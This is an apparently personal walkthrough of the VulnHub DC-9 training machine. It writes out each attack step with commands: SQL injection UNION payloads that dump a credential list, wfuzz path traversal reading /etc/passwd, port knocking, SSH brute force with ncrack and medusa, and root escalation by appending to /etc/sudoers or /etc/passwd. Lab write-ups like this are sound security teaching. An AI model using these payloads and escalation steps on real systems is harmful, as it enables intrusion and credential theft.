> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/vulnhub/dc/dc9.md).

# DC9

DC9 Vulnhub Walkthrough

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/DC9 192.168.1.113
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 10:34 EDT
Nmap scan report for 192.168.1.113
Host is up (0.00020s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:D7:AC:12 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.07 seconds

```

There is a website at port 80, let's put our IP on our browser and see what we gets

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hIV52BoJffKcde9KM%2Fimage.png?alt=media\&token=fe0407e2-8222-4e23-b0ff-9cb17048b927)

## Exploitation

### SQL Injection

After playing SQL injection for some time. I found out that `/search.php` is inject-able

I used `admin' or '1'='1`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hIsh53eBmkZU1vfro%2Fimage.png?alt=media\&token=b6325ee9-c089-4d86-a84e-5c8fa62c9c9b)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hIvFcO6trlPjuzwQV%2Fimage.png?alt=media\&token=b52df06b-9970-42a4-9435-263372be89a5)

As we can see from here all the data successfully retrieve from the database.

After some testing on how many columns I found out there are 6 columns available by using this `' UNION SELECT 1,2,3,4,5,6-- -`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hKOunCGQgszG8lT9i%2Fimage.png?alt=media\&token=71a018b5-ff57-43db-9397-057db05662a8)

By using `' UNION SELECT GROUP_CONCAT(SCHEMA_NAME),2,3,4,5,6 FROM` `information_schema.schemata-- -`&#x20;

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hMDh1OT7N3nI82wtR%2Fimage.png?alt=media\&token=5b709307-5343-474a-b228-62df565528a1)

We can see that 2 databases has extracted out. We can extract further by type

### Burp

Let's change to burp for easy access

Type this query at  the search section and you will get something at the response`' UNION SELECT GROUP_CONCAT(TABLE_NAME),2,3,4,5,6 FROM information_schema.tables WHERE table_schema = 'Users'-- -`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hWq9Kl3g8o_2ZHkJ8%2Fimage.png?alt=media\&token=499d9076-09dd-42ae-932f-0f0770a860a7)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hWv3kjG7XUtpCFBYw%2Fimage.png?alt=media\&token=ee53eeea-7862-449a-af26-6c86c0f778b5)

We can see that we have 2 tables named `StaffDetails` and `Users`. Meanwhile for the Users, we don't have anything output at the response means that we don't have any tables for Users.

Next, we want to extract columns from the tables

Type this

`' UNION SELECT GROUP_CONCAT(TABLE_NAME,':',COLUMN_NAME),2,3,4,5,6 FROM information_schema.columns WHERE table_schema="Staff"-- -`

to extract.

```
StaffDetails:id,StaffDetails:firstname,StaffDetails:lastname,StaffDetails:position,StaffDetails:phone,StaffDetails:email,StaffDetails:reg_date,Users:UserID,Users:Username,Users:Password
```

We got all the columns from 2 tables

Lets put it at terminal and separate it correctly

```
echo -n "Bunch Of Strings" | sed 's/,/\n/g'
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7heeb-45qLy2oyAaP5%2Fimage.png?alt=media\&token=52320b8c-56d0-42a3-be7a-68ec24764458)

We then extract the `user` tables columns&#x20;

`' UNION SELECT GROUP_CONCAT(table_name,':',column_name),2,3,4,5,6 FROM information_schema.columns WHERE table_schema='users'-- -`

```
UserDetails:id,UserDetails:firstname,UserDetails:lastname,UserDetails:username,UserDetails:password,UserDetails:reg_date
```

Put it to terminal again and separate it correctly

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hjtj78kL3Rkl5_nS1%2F-M7hk2Kjpu0g3kRJ00HL%2Fimage.png?alt=media\&token=acfff2bb-7beb-4936-a812-11d8fdeda973)

Got this 2 tables' columns ! Let's save it for later reference.

Let's take `Staff` tables and extract the columns.

I saw that there are Username and Password. Let's extract that by typing

`' UNION SELECT GROUP_CONCAT(Username,':',Password),2,3,4,5,6 FROM Staff.Users-- -`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7gB1bil3pMcFRlfe3y%2F-M7hfh-s2ea0Ltg1Qsga%2Fimage.png?alt=media\&token=566e1900-f48b-44de-bd83-b847380aa878)

Save it in CherryTree and extract another table.

`' UNION SELECT GROUP_CONCAT(username,':',password),2,3,4,5,6 FROM users.UserDetails-- -`

```
marym:3kfs86sfd,julied:468sfdfsd2,fredf:4sfd87sfd1,barneyr:RocksOff,tomc:TC&TheBoyz,jerrym:B8m#48sd,wilmaf:Pebbles,bettyr:BamBam01,chandlerb:UrAG0D!,joeyt:Passw0rd,rachelg:yN72#dsd,rossg:ILoveRachel,monicag:3248dsds7s,phoebeb:smellycats,scoots:YR3BVxxxw87,janitor:Ilovepeepee,janitor2:Hawaii-Five-0
```

Got this, do the same thing as before

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hkTKHvsPlnHCriLkv%2F-M7hnK_sIrCqNhM5Un2f%2Fimage.png?alt=media\&token=7c3f1f69-9783-400b-867a-27466072f4e6)

Now we can login using the admin credentials but before that, let's crack the md5 hash first

Go to this [website](https://hashes.com/en/decrypt/hash), and choose md5 hash, crack it!

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hkTKHvsPlnHCriLkv%2F-M7holXgTprzo82OvN25%2Fimage.png?alt=media\&token=c9bcbdb9-4a13-4a45-b837-30e29326c645)

The password is `transorbital1`

Login using the credentials at `/manage.php`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hkTKHvsPlnHCriLkv%2F-M7hp0ekQ1UWHYfIccJN%2Fimage.png?alt=media\&token=5502c1cd-d416-4fb1-8bc1-44025d4cc62f)

### Wfuzz

We see file does not exist, so I decided to use `wfuzz`

After some tries, we need to grab the PHPSESSID from burp then we need to specify it inside the command. and we need to put `../../../../../etc/passwd` to let it find what the fuzz is. Basically just bunch of try and errors. Besides, we need to see the length of the word so we can hide it. We need to run without `--hw`first, then only specify the length of the word in order to hide it. Command looks like this

```
wfuzz -c -b 'PHPSESSID=n4u2tae74ain2vd59ek4o8od5p' -w /usr/share/wordlists/wfuzz/general/common.txt http://192.168.1.113/manage.php?FUZZ=../../../../../../../etc/passwd
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hp1fMO0F495FNvs27%2F-M7hrjcwHgVT-ogi4yOv%2Fimage.png?alt=media\&token=1d08f2b0-c37c-45b1-b95a-e3269ddee7f1)

We can see that it is 100 word so we can specify the parameter `--hw` as 100

```
wfuzz -c -b 'PHPSESSID=n4u2tae74ain2vd59ek4o8od5p' -w /usr/share/wordlists/wfuzz/general/common.txt --hw 100 http://192.168.1.113/manage.php?FUZZ=../../../../../../../etc/passwd
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hp1fMO0F495FNvs27%2F-M7hrFwkfvYLfjFNCj0b%2Fimage.png?alt=media\&token=960603d8-e89e-4d32-9f4c-161ec5dc8ee2)

We can see that it is the `file` parameter.

### Searching For Good Stuff

If at the end of the URL we put `?file=../../../../../etc/passwd` , we will get something like this.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hp1fMO0F495FNvs27%2F-M7hs_QKT-UtXkzLvYPd%2Fimage.png?alt=media\&token=737b2948-0b07-466e-8e96-586fef55ed59)

After further enumeration, from Ippsec video, I know that inside `proc` directory a file called `sched_debug` contains all the process that run within the machine&#x20;

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hskGIU9Dt0YWXQdLp%2F-M7hvavxjQkBCwvyEpKY%2Fimage.png?alt=media\&token=aebbd01a-8b1e-4572-9b1c-f4d5c3d3728b)

it's kinda long, let's save it in the file.

Then, we only want to see the task, use `awk` to print the task column only

```
cat output | awk '{print $2}'
```

### Port Knocking

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hskGIU9Dt0YWXQdLp%2F-M7hy8eVRMjd3hsN5ya9%2Fimage.png?alt=media\&token=2808e7f2-892a-4a56-8f07-14bf25bb32ad)

After that I saw `knockd`is running, still remember the nmap scan?

the ssh port 22 is filtered, let's first navigate to the file see what we got at `/etc/knockd.conf`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hskGIU9Dt0YWXQdLp%2F-M7hyjgBBpmZzbFjEV8P%2Fimage.png?alt=media\&token=419a4b5b-ddf8-4ac1-bd81-52d56087fe9b)

We can see that if we want to let the port to be opened, we need to follow the port correctly in order, `7469,8475,9842` , if we want to close the port, then do it in other way.

Since we want the port to be open, we can use nmap to help us to run the port by using `-r` parameter

```
nmap -p- -r 192.168.1.113
```

Run the normal nmap scan again

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 13:31 EDT
Nmap scan report for 192.168.1.113
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:D7:AC:12 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.99 seconds

```

We can see that the ssh port is open now.

Now, we can use the credentials we got just now and let it brute forcce

We need to split the username and password into 2 files

```
cat creds | awk -F: '{print $1}' > users
```

```
cat creds | awk -F: '{print $2}' > passwords
```

### Ncrack

Then we can use `ncrack` to brute force the ssh logins

```
ncrack -U users -P passwords ssh://192.168.1.113
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i1MfjeoXxcWqojBCT%2Fimage.png?alt=media\&token=eaa842cc-7590-4cf7-a1b9-b84756e12f8b)

Now we can login !

## Privilege Escalation

After some logins, I found that `janitor` user has a file called `.secrets-for-putin`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i2QGG9i8bIf5RhmBO%2Fimage.png?alt=media\&token=1307898a-5e42-4b56-b2c3-31c76f112713)

After `cat` the file inside the directory, we got some passwords

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i2XxtBszNdWT8LE2c%2Fimage.png?alt=media\&token=7abb598d-47c0-40c6-920b-67c3386c0075)

Save the passwords into a file and use the users file and use `nrack` to crack again

I faced some problem to use ncrack so I change to `Medusa`.

```
medusa -U users -P passwords -h 192.168.1.113 -M ssh
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i3kbq8p0cd_5yopwV%2Fimage.png?alt=media\&token=bd27c3a1-99d2-4eaa-b367-1aec36e87e89)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i3q4ksoG1LiBeD-_i%2Fimage.png?alt=media\&token=23812954-6557-4fd1-bed3-c82dbcca6a05)

We found out that user `fredf` can be logged in

### Method 1

Then, type `sudo -l`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i449xIkgNu8ShX-kk%2Fimage.png?alt=media\&token=e7fb6c70-30d9-4494-9b6e-d684c8c58a62)

We can see that there is a sudo rights can be exploited.

run `sudo /opt/devstuff/dist/test/test`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i4Vaz-GkdD42CWW8i%2Fimage.png?alt=media\&token=9de10e24-ed75-43d8-8dff-92515cc14af1)

Got this, we can see that `test.py` is not running properly. Navigate to `/opt/devstuff` and we can find the `test.py` file

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i4kf-gVvo8sLOtgZy%2Fimage.png?alt=media\&token=87392b18-de8f-4633-a1db-7dad19386841)

We can use `nano test.py`&#x20;

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7i50jhFxvFjrvo6TQt%2Fimage.png?alt=media\&token=4101542a-6ba7-4d28-ac67-2ded23cff458)

We can see that, if the input argument is not equal to 3, then the code will return the error and exit. But if we have 3 arguments, then the first file will be read mode and it will append to the second file.

Navigate to `/tmp`

We can put `fredf ALL:NOPASSWD:ALL` into a file by `echo "fredf ALL=(ALL:ALL) ALL" > sudo_Add`

We need first copy the content of /etc/sudoers to /tmp/sudo\_Add by `sudo /opt/devstuff/dist/test/test /etc/sudoers sudo_Add`

Then we can type `sudo /opt/devstuff/dist/test/test /tmp/sudo_Add /etc/sudoers` to read the line from out `sudo_Add` file and append to the `/etc/sudoers`file

Then, we can type sudo -l again.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iBFFPWI4TTNwJrYcd%2Fimage.png?alt=media\&token=66c32972-8b9d-4872-b50f-dfa8a5ae2643)

Type `sudo /bin/bash` then we will get root

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iBLT31ymEBGQsMjxN%2Fimage.png?alt=media\&token=cddec51c-326f-4b8d-b96c-64577e7e6c90)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iBVci6W7FN2RZOPY4%2Fimage.png?alt=media\&token=22ebd21a-a259-4cb6-b722-9801ad86d104)

### Method 2

We can use `openssl` to create a password then append it to the `/etc/passwd`

```
openssl passwd -crypt -sald wow damn
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iCSf4lemUDxYtR7y4%2Fimage.png?alt=media\&token=98aed04a-8a48-4573-a653-026677bde6b5)

Then we use `cat /etc/passwd | grep fredf` to get the passwd that we want to modify

**Original**

```
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
```

`fredf` is the username

`x` is the hash

`1003` is the id and gid

then the name, directory and type of shell

**Modified**

```
choo:woPUDNLlXmMyI:0:0:choo:/root:/bin/bash
```

0 indicates is root id and gid

Let's run the `sudo /opt/devstuff/dist/test/test sudo_Add /etc/passwd`

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iDqZ-_G1QbW2F_E2S%2Fimage.png?alt=media\&token=4f23dd59-b90f-4fe9-965f-33f76aae095d)

Then we `su` to the username that we created, for me is `choo`

Password is the second argument of this command, so is `damn`

```
openssl passwd -crypt -sald wow damn
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iECpg2JbWcxY2hD6z%2Fimage.png?alt=media\&token=ab73a15d-7cf0-42c7-99a5-ddebdbeb5941)

Got root !

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7hz8_4vOsQLomnPZFd%2F-M7iEJ1oDTkGK1Jhy3hz%2Fimage.png?alt=media\&token=34ce42c2-bdda-4e15-bf3c-06b7fac1ed26)

Congratulation!
